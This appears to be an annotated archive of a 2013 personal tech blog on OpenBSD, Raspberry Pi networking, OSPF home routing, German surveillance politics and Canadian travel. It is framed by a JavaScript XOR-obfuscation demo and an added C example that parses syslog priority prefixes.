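// XOR is its own inverse, so one routine both garbles and restores.
function xorWith(data, ks) {
  const out = Buffer.alloc(data.length);
  for (let i = 0; i < data.length; i++) out[i] = data[i] ^ ks[i];
  return out;
}

// Server side: garble the article under a fresh random password. The password
// is returned next to the payload because the browser needs it to undo the XOR.
function obfuscate(text, password = nodeCrypto.randomBytes(8).toString("hex")) {
  const body = Buffer.from(text, "utf8");
  const payload = xorWith(body, keystream(password, body.length)).toString("base64");
  return { password, payload };
}

// Client side: what an in-page script would do for a graphical browser.
function deobfuscate(page) {
  const body = Buffer.from(page.payload, "base64");
  return xorWith(body, keystream(page.password, body.length)).toString("utf8");
}

// A crawler that only scans the raw response bytes for words sees garble.
function rawBytesContain(page, word) {
  return Buffer.from(page.payload, "base64").includes(word);
}

// Constructed sample article text, not taken from the blog.
const SAMPLE = "Constructed sample article: pre-ordered OpenBSD, robots.txt ignored.";

const page = obfuscate(SAMPLE);
console.log("served payload :", page.payload);
console.log("keyword visible:", rawBytesContain(page, "OpenBSD"));
console.log("after script   :", deobfuscate(page));
```

Nothing here is secret from a reader who holds the whole response, which is the difference from encryption with a key that never travels with the data.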



Just more preaching about preventing spying...

July 18th, 2013

For the past few weeks everything in the media is about PRISM, NSA and BND, but I'm gonna talk about the real problem (topologies) and what I think is a solution, mesh networking...

Oh yes I got a haircut a while ago :P thanks!



Centroid Blog for Lynx readers

July 25th, 2013

http://centroid.eu/public/centroid-blog.sh.txt. I wrote this small shell script for you (and me). It deobfuscates the blog just like javascript does on graphical browsers, but you only get the first 10 articles which should be enough. Cheers!



Watched the Big Dipper out my Kitchen Window

July 28th, 2013

The Big Dipper was visible out my kitchen window which faces north tonight. If I ducked and looked I could see Polaris too. For those that don't know the Big Dipper is called the Ursa Major constellation. I came up with the hypothesis that in 6 months when I look out this window at the same time that Ursa Major will be out of my field of view because of how the window is like. But I should be able to see Polaris still although I won't be able to identify it.



I asked for a static IP again

August 5th, 2013

I asked my provider (m-net) to bring back static IPs. They discontinued the static IPs in last year's 4th quarter or something and I'm missing it. I want to host my own mail server. I want to host my own DNS server, all on my own hardware. If they don't bring the static IPs back to customers as an extra option I'm probably going to look for a new ISP, one that does this. I'm also willing to pay more again.



Purchased a Raspberry Pi mini-computer

August 15th, 2013

I have purchased a Raspberry Pi. It will arrive here either on Saturday or next week. I have this idea for the Pi. I currently have an open access point here at home that isn't encrypted. People can send a rate-limited UDP packet from it but everything is pretty well blocked off. I want to take a new step forward. I want to completely partition this wifi AP from the Internet and have the Raspberry Pi run its soul. I'll be using wildcarddnsd like before to hijack DNS requests and point them to the Pi. I'll also put up a message wiki for people to write in. I think it'll rock. More on this later.

I have compiled a FreeBSD image as found here. The provided script worked well except in 2 parts I had to make modifications to my FreeBSD 9.1 VPS in order to compile it. One was the change:

# pw useradd auditdistd -u 78 -g 77 -d /var/empty -s /usr/sbin/nologin \
-c "Auditdistd unprivileged user"

And the other was the fact that the $DTB was not bcm2835-rpi-b.dtb but rather just rpi.dtb. Other than that the script ran flawlessly.



Wait a minute... not so fast... what changed?

August 16th, 2013

In Germany the ruling government has declared the spy affair to be dead. A Mr. Pofalla and Mr. Friedrich, who are ministers, have voiced that there is nothing to go on. Nothing to go on? These ministers have admitted to us that the BND and other German secret services are actively spying on us. So while the USA may or may not be spying on German citizens, the interior secret services are.

While our hands are tied in the public in terms of doing something about this right now, this does seem to be a good way to express my feelings at the vote. I'm voting Pirate Party of Germany because I'm for transparency and for an Internet that is supported by a political process.

While I hate to write about this whole spy affair as it really ruins the good mood my blog used to give me, I think it's necessary to write about this issue because it affects our freedom. Like Bruce Schneier said that in the USA the NSA have commandeered the Internet (see his blog for that), I'm drawing similar conclusions here in Germany about the BND. How dare they attempt to take the Internet away from us! This is a digital coup! While not literally "taking it away" they are installing facilities in several places to read Internet traffic, they've in fact taken away the privacy going on the digital links.

See you at the vote, where my vote will probably not count unless my party gets over 5% of the vote, which is a grey zone. But you never know.



Got Raspberry Pi, it's running Linux now

August 18th, 2013

I found the FreeBSD Pi image I made still lacked a bit of stability. So I put Raspbian Wheezy on my Pi. I'll use this pi like I said below. Right now what's running is a wiki, with apache and mysqld as well as wildcarddnsd which wildcards the entire Internet's names to one IP. It seems to work nicely.

If someone goes to "somedomainname.tld" it'll redirect to the wiki and give an editable page for Somedomainname.tld. I think it may be popular around here, if only I knew how to turn the edit history off. Overall I'm a happy camper.



Ordered a WLAN USB adapter for the Pi

August 23rd, 2013

I'd say the Raspberry Pi is a success. I'm taking it a step further now to replace the Apple Access Point (Apple Extreme 2nd gen.) and I'll make savings in electricity usage. What I'm doing is getting a USB WLAN adapter from Edimax which is compatible with my Pi. I'm going to have to run this in hostap mode somehow, something I haven't figured out on the Pi yet, I'm sure it'll work though.



Got two books I ordered

August 25th, 2013

I got the following books:

  • PostgreSQL 9.0 High Performance - Gregory Smith
  • PostgreSQL 9 Admin Cookbook - Simon Riggs and Hannu Krosing

I'll be reading these in the next little while as I'm interested in their clustering.



Vacationing in Canada next month

August 27th, 2013

I'm going to be in a lot of places, and all over. Ontario, Saskatchewan and Nunavut (which is way up north). All my flights and train rides have been purchased and I have a sort of schedule to follow to see all my old friends. This is my first vacation in 2 years and I haven't been to Canada in a decade, so this is gonna be a great time.



Will be guest DJ'ing at SVPRadio.COM

August 27th, 2013

On September 25th I'll be guest DJ'ing in the reggae spot (10-11PM EST). I'll probably also make a guest appearance on the Get Fresh show with DJ Jaz. I'm really looking forward to this. I've never seen the studio before so this will be great spending some time with DJ Jaz.

The type of music I'll be DJ'ing will be Reggae. It will consist of the artists and music that has been with me for the last few years, (mostly on youtube). I bought a lot of music for this spot.



RadeonDRM on OpenBSD

September 3rd, 2013

OpenBSD hardware with AMD Radeon cards (and Intel HD) have a new video driver. The driver is still bleeding edge but I was able to upgrade my OpenBSD-current netbook which has an AMD chip and my first impression was shock. I was expecting something on the console but nothing appeared. So I hard-powercycled my netbook and hoped to be seeing something better the next time around and I was not let down again. The RadeonDRM is really nice and if you had seen a macppc console before that's how the amd64 netbook's console now looks like. Here is a link to an undeadly article that talks about the changes for radeondrm(4). Thank you to Jonathan Gray who programmed this driver. Also I can now exit X (from startx) and get back to console, I couldn't do that before on this netbook, this is really nice.



Wildcarddnsd has little new features for BETA8

September 4th, 2013

I'm going on holidays in a bit more than 2 weeks, this leaves the following month for wildcarddnsd development:

      October               November
Su Mo Tu We Th Fr Sa  Su Mo Tu We Th Fr Sa
       1  2  3  4  5                  1  2
 6  7  8  9 10 11 12   3  4  5  6  7  8  9
13 14 15 16 17 18 19  10 11 12 13 14 15 16
20 21 22 23 24 25 26  17 18 19 20 21 22 23
27 28 29 30 31        24 25 26 27 28 29 30

November 29th is W's birthday and I'll try to tag the tree for that, reflecting BETA_8 changes. What changes? We have a debug mode as found on line 3 of this markup. Also I'd like to get some changes in that I needed for compiling W on the Raspberry Pi; other than that I don't think I have time to do any big changes. What I have attempted to do was replace the BerkeleyDB as a whole, and replace the parsing with a YACC parser, but that went nowhere as well. I'm interested in all sorts of help for this daemon as it's getting older and needs a lot more functionality. Any hackers interested in hacking on Wildcarddnsd?



OpenSMTPD upgraded on io.solarscale.de

September 5th, 2013

I noticed OpenSMTPD didn't encrypt outbound mails with STARTTLS. Grabbing a recent snapshot fixed this. Thanks to lynge on #opensmtpd/freenode for helping.



Just a thought, is Snowden a FUD-Trojan?

September 6th, 2013

A trojan is a piece of payload smuggled into enemy territory. It could be a message, a program, or, where the name comes from, a payload of soldiers in a wooden horse. So then I have to wonder, does anyone ever consider that the entire Snowden affair has been planted by the NSA all along? FUD stands for Fear, Uncertainty and Doubt. So is Snowden a FUD-Trojan? Does he spread fear in all directions and primarily on our beloved Internet? I have considered it. And I have considered my viewpoint. I'm in no position to defend that AES is unbreakable. Nor do I understand the mathematics behind RSA or Diffie-Hellman to a full extent. The NSA has some very bright mathematicians, some of the best it is said. So what if there is a breakthrough? Naturally if there is a breakthrough we need to know. Because the Internet's secrets are worth more than the security of the USA. Some things should stay secret, even from the NSA's eyes, is my opinion. At the same time some things should become open. Like cryptography and its strength. The Internet is on a collective downward spiral if cryptography doesn't work. Because somewhere out there someone has the same formulas as the NSA, and they have a much more fearsome plan, I predict.



My public AP is on an Edimax adapter now

September 6th, 2013

I forgot to blog about it. I have put the Edimax EW-7811Un adapter on my Raspberry Pi and have gotten rid of the Apple Access Point. There is only one problem. The range is not as much as the UFO used to give me. I'm not even sure if anyone is connecting to it anymore. It works in the next room but not my entire apartment, that's how low the range is. Oh well. I'll keep it running while I'm on vacation, perhaps something will come of it.



Good article by Bruce Schneier

September 6th, 2013

The article talks about how engineers have built the Internet and the need to fix it. Some of those engineers have destroyed the Internet and gagged themselves in national secrecy.

I wrote about most of this in June/July. Take a look in my blog for those months. I like the African village paths and that the Internet should be like this.

What I'd mostly like to see is the Internet evolving into being in the hands of the people. I'm not a communist but I believe that a bunch of wires leading to a fortified address is the wrong way to "share" the Internet with all. We need a distributed effort in our own hands and we all need to learn how to network. Don't leave it to just engineers, get everyone involved in some form. Anyhow good article, we're waking up.



Pre-Ordered OpenBSD 5.4

September 12th, 2013

I have ordered it from OpenBSDEurope again. I wasn't satisfied with the lateness of Lehmann's last time. This is rockin'! Although the song is far from rock! It is nice though.



One year of ap.centroid.eu

September 14th, 2013

Also known as moon.virgostar.net, the VPS sits in Hong Kong. I registered it on September 12th last year. While it has been a very reliable computer with only a few hiccups I'm considering moving it next year to Canada. It's nice to have an Asian DNS server but a DNS server alone is not worth 20 bucks a month. We'll see, perhaps I can get a few friends to chip in on the server in Canada, then I can keep the moon where it belongs..far away like HK. In 1 year this server did 3 GB of web traffic for me. Not very much. I can get that in 1 month on the European VPS on a good month.



Southbound Equinox in 7 days

September 15th, 2013

Next Sunday the planet will be at right angles between axis and sun. People on the equator will have the sun directly overhead.



Pirate Party got 2% in Bavarian election

September 15th, 2013

I did vote for them. And I feel a bit bitter. Anyhow perhaps in 5 years there'll be another chance for them. It's good however that we got 2% in.



Tomorrow

September 21st, 2013

... is equinox and the German federal election. I'm gonna try voting for the Pirate Party. Let's see if the clocks really do tick differently in Bavaria than in the rest of Germany.



e* came and went

September 23rd, 2013

Both the equinox and the election (both start with e) came and went. Again I voted for the Pirate Party and we got 2.2% which is not enough for the pirates to get represented in the Bundestag. I'll give the pirates one more chance at the European elections but if they strike out (3 strikes) there then I'm going to possibly vote for someone else next term.

As far as government I'd be happy with a grand coalition or a CDU-Greens coalition. As I don't think the democratic parties want anything to do with die Linke (who is the 3rd highest). Anyhow I knew it would come to this but I didn't know the FDP would be so weak :-), but it's all better this way anyhow.

I'm not a fan of the "Ueberhangs Mandat" which is a threshold that excludes parties in parliament which get under 5%. 2.2% is worth around a dozen seats in parliament so this is sorta undemocratic to prevent small votes.

As far as the impact that the pirates made, perhaps there will be a new shuffling of parties next election. I'm hoping for more issues based on the Snowden revelations, and more politics regarding the Internet.



SVPRadio appearance came and went

September 26th, 2013

I'm in Toronto, and was on SVPRadio yesterday and it turned out very well. Perhaps more later, I'm travelling to Saskatchewan soon.



Some pictures from my vacation

October 1st, 2013

I took the VIA train from Toronto to Saskatoon.



First Snowday of the Year

October 9th, 2013

I'm in Iqaluit, Baffin Island, Nunavut, Canada. It's near the Arctic Circle. I came here 2 days ago. Yesterday we had a storm with gusts of 100 km/h go through which dumped a bit of snow. It is the first snowday in Iqaluit of the year. Temperatures are hovering around 0 degrees Celsius and are expected to drop a little. Although I do not have pictures at the ready yet I did make some pictures and I'll be sharing those soon. I'm in good health and spirits and will be back in the south of Canada in 2 days and back in Germany in 3 days. Weather permitting of course.



I'm home now

October 13th, 2013

My vacation ends tomorrow. I'm home now. Pictures will likely follow tomorrow.



Snowstorm in Nunavut on the 8th of October

October 13th, 2013

In Nunavut the stop signs are different.

This is my friend Aaron.

The snow reduced visibility pretty much...



Donated 150 euros to OpenBSD

October 14th, 2013

It's donation time again, probably the last of this year. I donated 150 euros to Theo de Raadt. Happy Canadian Thanksgiving!



A Train to Nowhere (Sep. 28th - 30th)

October 14th, 2013

On my second part of my vacation I took the train from Toronto to Saskatoon.

This was in northern Ontario...

The ride in the "Skydome" at sunset...

Before getting to Winnipeg I saw this flock of geese...

Winnipeg...

That was my journey on this train...



Iqaluit, Nunavut (October 7th - 11th)

October 14th, 2013

On my 4th part of my vacation I went to Iqaluit, Nunavut, Canada which is just south of the arctic circle...
When one gets to Iqaluit this is what they'll see (the lady didn't want her face online so I edited it out)...

The second day I was there a snowstorm (part of the storm that hit North Dakota a few days earlier) from the south hit us...
Here is a picture of the worker crews in Apex restoring power which winds of 100 km/h knocked down...that day there were about 3 power failures despite Aaron telling me they got a new Diesel power system set up for redundancy..

The next day was nice and we trekked out to the Apex beach where the arcticfibre.com landing point is supposed to be..

Here are also the original buildings of the Hudson's Bay Company which was a British trading company...

I felt really good and Aaron made these photos of me..

We went to a museum of Nunavut...

Iqaluit was once a US military base, so there are remnants of it everywhere..

In fact there is radio and satellite equipment everywhere, currently they get Internet through this.. which will take a backup role once the fibre is laid..

On our way around we saw these chained sled dogs.. never approach these, they might rip off a limb of yours...(not kidding!)...

And here is also a river where they get arctic char (sp) a type of fish for consumption.. the water is good to drink.

That was Iqaluit! I had the best of times there! Thanks and maybe I'll return for another visit some time soon!



Upgraded my iPod touch to iOS 7

October 14th, 2013

So far it looks pretty good. I hope it retains stability.



Ordered a Soekris

October 15th, 2013

I have ordered a Soekris 6501-70 router for home. It's replacing my G4 Cube which is 12 years old. The Cube wasn't particularly energy efficient and lacked USB 2.0. I'm getting all that with the new Soekris. Also I can write it off in taxes because I use it for work (it's part of my home network and an important component of it).



Network Rearrangement in 2 Weeks

October 15th, 2013

On April 25th, 2013 I created a small network map that detailed how I intend to use my IPSEC tunneling host over wifi. Well the network has grown. I have Vodafone LTE and M-Net DSL as my Internet links and Venus (the ordered Soekris) which will help me redo my network. Here is the updated map:

So what I plan on doing is create 2 rdomain routes (an OpenBSD thing) from uranus to venus for 2 gif tunnels. One will go over 5 GHz and the other over 2.4 GHz. The routing is decided with OSPF over the gif tunnels and should fail over when the AREA 0 fails (area 0 will be the 5 GHz tunnel, which is my preference). From Venus itself the M-Net DSL link will have a static route; this ensures that I only send through the LTE link when I flip the route manually, a safe feature since I use 5-10 times as much bandwidth on the DSL link as on the LTE link (that link is backup only). I hope it works out as I have envisioned it, but it can change minutely or even in big ways.



Deutsche Telekom

October 17th, 2013

The DT made a poll whether users want freedom or security.

My answer would be, I want freedom, as I'm already using ultra secure platforms and don't need inhibited functionality of the Internet. But then again I'm not a DT customer...but let this opinion stand for my ISPs that I'm using!



Got the Soekris

October 19th, 2013

I got the soekris but I won't have time this weekend to install anything on it. I also don't have pictures yet, those will follow next week some time. I will name this soekris Venus from now on.



Venus (Soekris router)

October 21st, 2013

Here is a picture of venus:

Here is the dmesg:

OpenBSD 5.3 (GENERIC) #53: Tue Mar 12 18:15:44 MDT 2013
    deraadt@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC
real mem = 2146304000 (2046MB)
avail mem = 2066771968 (1971MB)
mainbus0 at root
bios0 at mainbus0
acpi at bios0 not configured
mpbios0 at bios0: Intel MP Specification 1.4
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Genuine Intel(R) CPU @ 1.60GHz, 1600.22 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,\
VMX,EST,TM2,SSSE3,CX16,xTPR,PDCM,MOVBE,NXE,LONG,LAHF,PERF
cpu0: 512KB 64b/line 8-way L2 cache
cpu0: apic clock running at 99MHz
cpu at mainbus0: not configured
mpbios0: bus 0 is type PCI   
mpbios0: bus 64 is type ISA   
ioapic0 at mainbus0: apid 0 pa 0xfec00000, version 20, 24 pins
cpu0: unknown Enhanced SpeedStep CPU, msr 0x0615101c0600101c
cpu0: using only highest and lowest power states
cpu0: Enhanced SpeedStep 1600 MHz: speeds: 1600, 600 MHz
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel E600 Host" rev 0x05
pchb1 at pci0 dev 1 function 0 "Intel E600 Config" rev 0x00
ppb0 at pci0 dev 23 function 0 "Intel E600 PCIE" rev 0x00
pci1 at ppb0 bus 1
ppb1 at pci1 dev 0 function 0 "Intel EG20T PCIE" rev 0x01
pci2 at ppb1 bus 2
"Intel EG20T Packet Hub" rev 0x01 at pci2 dev 0 function 0 not configured
"Intel EG20T Ethernet" rev 0x02 at pci2 dev 0 function 1 not configured
"Intel EG20T GPIO" rev 0x01 at pci2 dev 0 function 2 not configured
ohci0 at pci2 dev 2 function 0 "Intel EG20T USB" rev 0x02: apic 0 int 19, version 1.0
ohci1 at pci2 dev 2 function 1 "Intel EG20T USB" rev 0x02: apic 0 int 19, version 1.0
ohci2 at pci2 dev 2 function 2 "Intel EG20T USB" rev 0x02: apic 0 int 19, version 1.0
ehci0 at pci2 dev 2 function 3 "Intel EG20T USB" rev 0x02: apic 0 int 19
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
"Intel EG20T USB Client" rev 0x02 at pci2 dev 2 function 4 not configured
sdhc0 at pci2 dev 4 function 0 "Intel EG20T SDIO" rev 0x01: apic 0 int 18
sdmmc0 at sdhc0
sdhc1 at pci2 dev 4 function 1 "Intel EG20T SDIO" rev 0x01: apic 0 int 18
sdmmc1 at sdhc1
ahci0 at pci2 dev 6 function 0 "Intel EG20T AHCI" rev 0x02: msi, AHCI 1.1
scsibus0 at ahci0: 32 targets
sd0 at scsibus0 targ 1 lun 0:  SCSI3 0/direct fixed naa.500151795931e477
sd0: 76319MB, 512 bytes/sector, 156301488 sectors, thin
ohci3 at pci2 dev 8 function 0 "Intel EG20T USB" rev 0x02: apic 0 int 16, version 1.0
ohci4 at pci2 dev 8 function 1 "Intel EG20T USB" rev 0x02: apic 0 int 16, version 1.0
ohci5 at pci2 dev 8 function 2 "Intel EG20T USB" rev 0x02: apic 0 int 16, version 1.0
ehci1 at pci2 dev 8 function 3 "Intel EG20T USB" rev 0x02: apic 0 int 16
usb1 at ehci1: USB revision 2.0
uhub1 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
"Intel EG20T DMA" rev 0x00 at pci2 dev 10 function 0 not configured
puc0 at pci2 dev 10 function 1 "Intel EG20T Serial" rev 0x01: ports: 1 com
com2 at puc0 port 0 apic 0 int 19: ti16750, 64 byte fifo
puc1 at pci2 dev 10 function 2 "Intel EG20T Serial" rev 0x00: ports: 1 com
com3 at puc1 port 0 apic 0 int 19: ti16750, 64 byte fifo
puc2 at pci2 dev 10 function 3 "Intel EG20T Serial" rev 0x00: ports: 1 com
com4 at puc2 port 0 apic 0 int 19: ti16750, 64 byte fifo
puc3 at pci2 dev 10 function 4 "Intel EG20T Serial" rev 0x00: ports: 1 com
com5 at puc3 port 0 apic 0 int 19: ti16750, 64 byte fifo
"Intel EG20T DMA" rev 0x00 at pci2 dev 12 function 0 not configured
"Intel EG20T SPI" rev 0x00 at pci2 dev 12 function 1 not configured
"Intel EG20T I2C" rev 0x00 at pci2 dev 12 function 2 not configured
"Intel EG20T CAN" rev 0x00 at pci2 dev 12 function 3 not configured
"Intel EG20T 1588" rev 0x01 at pci2 dev 12 function 4 not configured
usb2 at ohci0: USB revision 1.0
uhub2 at usb2 "Intel OHCI root hub" rev 1.00/1.00 addr 1
usb3 at ohci1: USB revision 1.0
uhub3 at usb3 "Intel OHCI root hub" rev 1.00/1.00 addr 1
usb4 at ohci2: USB revision 1.0
uhub4 at usb4 "Intel OHCI root hub" rev 1.00/1.00 addr 1
usb5 at ohci3: USB revision 1.0
uhub5 at usb5 "Intel OHCI root hub" rev 1.00/1.00 addr 1
usb6 at ohci4: USB revision 1.0
uhub6 at usb6 "Intel OHCI root hub" rev 1.00/1.00 addr 1
usb7 at ohci5: USB revision 1.0
uhub7 at usb7 "Intel OHCI root hub" rev 1.00/1.00 addr 1
ppb2 at pci0 dev 24 function 0 "Intel E600 PCIE" rev 0x00
pci3 at ppb2 bus 3
ppb3 at pci3 dev 0 function 0 "IDT 89HPES4T4" rev 0x0e
pci4 at ppb3 bus 4
ppb4 at pci4 dev 2 function 0 "IDT 89HPES4T4" rev 0x0e
pci5 at ppb4 bus 5
em0 at pci5 dev 0 function 0 "Intel PRO/1000 MT (82574L)" rev 0x00: msi, address 00:00:24:d0:1e:a4
ppb5 at pci4 dev 3 function 0 "IDT 89HPES4T4" rev 0x0e
pci6 at ppb5 bus 6
em1 at pci6 dev 0 function 0 "Intel PRO/1000 MT (82574L)" rev 0x00: msi, address 00:00:24:d0:1e:a5
ppb6 at pci4 dev 4 function 0 "IDT 89HPES4T4" rev 0x0e
pci7 at ppb6 bus 7
ppb7 at pci0 dev 25 function 0 "Intel E600 PCIE" rev 0x00
pci8 at ppb7 bus 8
ppb8 at pci8 dev 0 function 0 "IDT 89HPES4T4" rev 0x0e
pci9 at ppb8 bus 9
ppb9 at pci9 dev 2 function 0 "IDT 89HPES4T4" rev 0x0e
pci10 at ppb9 bus 10
em2 at pci10 dev 0 function 0 "Intel PRO/1000 MT (82574L)" rev 0x00: msi, address 00:00:24:d0:1e:a6
ppb10 at pci9 dev 3 function 0 "IDT 89HPES4T4" rev 0x0e
pci11 at ppb10 bus 11
em3 at pci11 dev 0 function 0 "Intel PRO/1000 MT (82574L)" rev 0x00: msi, address 00:00:24:d0:1e:a7
ppb11 at pci9 dev 4 function 0 "IDT 89HPES4T4" rev 0x0e
pci12 at ppb11 bus 12
ppb12 at pci0 dev 26 function 0 "Intel E600 PCIE" rev 0x00
pci13 at ppb12 bus 13
tcpcib0 at pci0 dev 31 function 0 "Intel E600 LPC" rev 0x00: 14318179 Hz timer, watchdog
isa0 at tcpcib0
isadma0 at isa0
com0 at isa0 port 0x3f8/8 irq 4: ti16750, 64 byte fifo
com0: console
pcppi0 at isa0 port 0x61
spkr0 at pcppi0
mtrr: Pentium Pro MTRR support
vscsi0 at root
scsibus1 at vscsi0: 256 targets
softraid0 at root
scsibus2 at softraid0: 256 targets
root on sd0a (4bcb82dcecf261d5.a) swap on sd0b dump on sd0b



Mars (G4 Cube) has been donated to the OpenBSD project

October 23rd, 2013

A developer of OpenBSD will be taking care of this box when I send it to him (probably leaving my doors saturday). All in all I'm very happy to have found a good home for this computer.



Testing TOR Onion Routing

October 24th, 2013

I've installed tor from the OpenBSD ports on my workstation Jupiter. Tor is an anonymizer service for HTTP and HTTPS. I'm gonna give this a go for a few hours, days, weeks, months or so depending how I feel about it.



OpenBSD 5.4 Arrived!

October 26th, 2013

OpenBSD 5.4 arrived. Thank you OpenBSD Europe! And thank you OpenBSD!



My OSPF Network

October 27th, 2013

I have finally set everything up like I want it to. And so far I have not created a packetstorm, but who knows what's next. So here is my OSPF Network the best I can explain it:

                                        +----------------+
Luna &                                  | Fritz!Box LTE  |======= LTE Network
Gaia      Jupiter                       +----------------+
    ||      ||                                 ||
    ||      ||                                 ||
    ||      ||   }-------- Wifi -------{       ||
    ||      ||   }-------- IPSEC ------{       ||
    ||      ||                                 ||
 +---------------+ gif0  area 0.0.0.0   +--------------+
 |               |======================|              |     +--------+
 |    Uranus     |                      |     Venus    |=====| phone 2|
 |               | gif1  area 0.0.0.1   |              |     +--------+
 |               |======================|              |
 +---------------+                      +--------------+
    ||      ||                                 ||
    ||      ||                                 || 
    ||      ||                                 || Static default route
    ||      ||                                 ||
    ||      ||                                 ||
Phone #1  Open                          +----------------+
                                        |Fritz!Box DSL   |======= DSL Network
                                        +----------------+
Venus' ospfd.conf
password="secret"
router-id 0.0.0.0
redistribute static
redistribute 0.0.0.0/0
area 0.0.0.0 {
        interface gif0 {
                router-priority 1
                auth-type simple
                auth-key $password
        }
}
area 0.0.0.1 {
        interface gif1 {
                router-priority 5
                auth-type simple
                auth-key $password
        }
}
Uranus' ospfd.conf
password="secret"
router-id 0.0.0.1
fib-update yes
redistribute 192.168.32.0/24
redistribute 192.168.33.0/24
redistribute 192.168.34.0/24
redistribute 192.168.35.0/24
redistribute 192.168.36.0/24
redistribute 192.168.1.0/24
redistribute 192.168.2.0/24
area 0.0.0.0 {
        interface gif0 {
                router-priority 10
                auth-type simple
                auth-key $password
        }
}
area 0.0.0.1 {
        interface gif1 {
                router-priority 5
                auth-type simple
                auth-key $password
        }
}

If there are any hints on how to improve on this they'd be appreciated.



All computers upgraded to OpenBSD 5.4

October 29th, 2013

It's such a joy to upgrade OpenBSD. /bsd.rd and sysmerge followed by a pkg_add -u. I have upgraded jupiter, luna, uranus and venus all to 5.4. And there is no errata54 yet. Perfect! Fallout hasn't been noticed except that the nvidia driver (nv) for OpenBSD 5.4 sucks. I'm considering buying a new AMD Radeon graphics card in the 60-80 euros range. Since my nvidia card is fairly old in model number a new card in that price range will probably be compatible in performance like before.



Nvidia Card about to be replaced

October 29th, 2013

I have purchased a Sapphire Radeon HD5450 graphics card. This card will replace my MSI N250GTS Twin Frozr 1G 1GB DDR3 card that I originally bought with Jupiter. I hope they are comparable in performance. Just that the Radeon doesn't do 2 monitors which the Nvidia card did. But since I don't do such a setup it should be fine.



A tiny blip on the W commit log screen

October 30th, 2013

Wildcarddnsd didn't get much commit time this year. But this time there was something. I committed support for Raspberry Pi running raspbian. That's gotta count for something, however small. Have fun with it!



Centroid blog now available in CVS

November 1st, 2013

I have decided to open source the PHP behind this blog. It's all about letting go and showing the innards isn't it? :-) Anyhow here are the sources. This PHP source code has never seen anyone's eyes but mine before this. Perhaps it's not great but it makes this blog the way it is.



OpenBSD 5.4 released

November 1st, 2013

You can now download OpenBSD 5.4 from your favourite OpenBSD FTP mirror. I usually use ftp.eu.openbsd.org in europe but if I was in north america I'd use ftp.openbsd.org. Congratulations to the OpenBSD team for yet another great release!



Fast Hellos are on

November 1st, 2013

Yesterday I turned on fast hellos on my OSPF setup. This is what venus' ospfd.conf file looks like now:

... some cut ...
area 0.0.0.0 {
        interface gif0 {
                router-priority 1
                metric 1
                router-dead-time 40
                auth-type simple
                auth-key $password
                router-dead-time minimal
                fast-hello-interval msec 333
        }
        interface gif1 {
                router-priority 5
                metric 10
                router-dead-time 40
                auth-type simple
                auth-key $password
                router-dead-time minimal
                fast-hello-interval msec 333
        }
}
Notice gif0 has a lower metric than gif1. The fast-hello-interval time is 333 msecs, which is also the default so it needn't be there. The "router-dead-time minimal" causes fast hellos to go on. So when I watch the packets on gif1 which isn't used for traffic I see:
# netstat -nw 1 -I gif1
 gif1 in       gif1 out              total in      total out            
 packets  errs  packets  errs colls   packets  errs  packets  errs colls
  200827     0   209273     0     0  75406364     0 80678099     0     0
       3     0        3     0     0        29     0       29     0     0
       3     0        3     0     0        22     0       22     0     0
...
exactly 3 packets per second in either direction. I suspect now that when my LTE fritz!box crashes again that the failover to the gif1 link will be next to instant.



Jupiter (computer) now on Radeon

November 3rd, 2013

After 3.5 years of Nvidia, the box is now running a low to medium end Sapphire Radeon HD5450 card. I'm saving a ton of electricity with this card too! And OpenBSD is fast again! Wonders!



Facilities and Priorities in syslog

November 4th, 2013

We had this problem in that we didn't know what facility a certain program was syslogging to, so we straced it (in linux), check a sample here:

root@raspberrypi:~# tail /tmp/blah.out
read(1, "TZif2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0"..., 4096) = 118
_llseek(1, -6, [112], SEEK_CUR)         = 0
read(1, "\nUTC0\n", 4096)               = 6
close(1)                                = 0
munmap(0xb6caf000, 4096)                = 0
socket(PF_FILE, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 1
connect(1, {sa_family=AF_FILE, path="/dev/log"}, 110) = 0
send(1, "<13>Nov  3 00:00:14 pi: hi", 26, MSG_NOSIGNAL) = 26
close(1)                                = 0
exit_group(0)                           = ?
That was produced with the input "strace -o blah.out logger hi". So syslog logs a number inside <> at the beginning to indicate what facility and priority it is. It's sorta a code. So I wrote the following BSD program to convert the number into their respective fac and pri. Enjoy!
root@raspberrypi:/tmp# ./facility 13
facility: (8)user, priority: (5)notice

For administrivia, how would you speed up this program? Take a look at /usr/include/syslog.h and think binary search.
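An added example (not the author's facility program, which is not reproduced on this page): C code that parses the `<N>` prefix seen in the strace output and prints it in the same format as the output above. The function names are this example's own. Because the facility number is PRI >> 3 and the priority is PRI & 7, both names come from a direct array lookup, so no search is needed at all.

```c
#include <stdio.h>
#include <string.h>

/* Facility names indexed by facility number (PRI >> 3), per RFC 3164 and
 * syslog.h. Numbers 12-15 are named differently across systems, so they
 * are left unnamed here. */
static const char *const facility_names[24] = {
    "kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
    "uucp", "cron", "authpriv", "ftp", NULL, NULL, NULL, NULL,
    "local0", "local1", "local2", "local3",
    "local4", "local5", "local6", "local7"
};

/* Priority (severity) names indexed by PRI & 7. */
static const char *const priority_names[8] = {
    "emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"
};

/* Parse the leading "<N>" of a syslog datagram.
 * Returns N (0..191), or -1 if the prefix is missing or malformed. */
int parse_pri(const char *msg)
{
    int pri = 0, digits = 0;

    if (msg == NULL || *msg != '<')
        return -1;
    for (msg++; *msg >= '0' && *msg <= '9'; msg++) {
        if (++digits > 3)
            return -1;
        pri = pri * 10 + (*msg - '0');
    }
    if (digits == 0 || *msg != '>' || pri > 191)
        return -1;
    return pri;
}

/* Facility number (0..23) of a message, or -1 if the prefix is malformed. */
int pri_facility(const char *msg)
{
    int p = parse_pri(msg);
    return p < 0 ? -1 : p >> 3;
}

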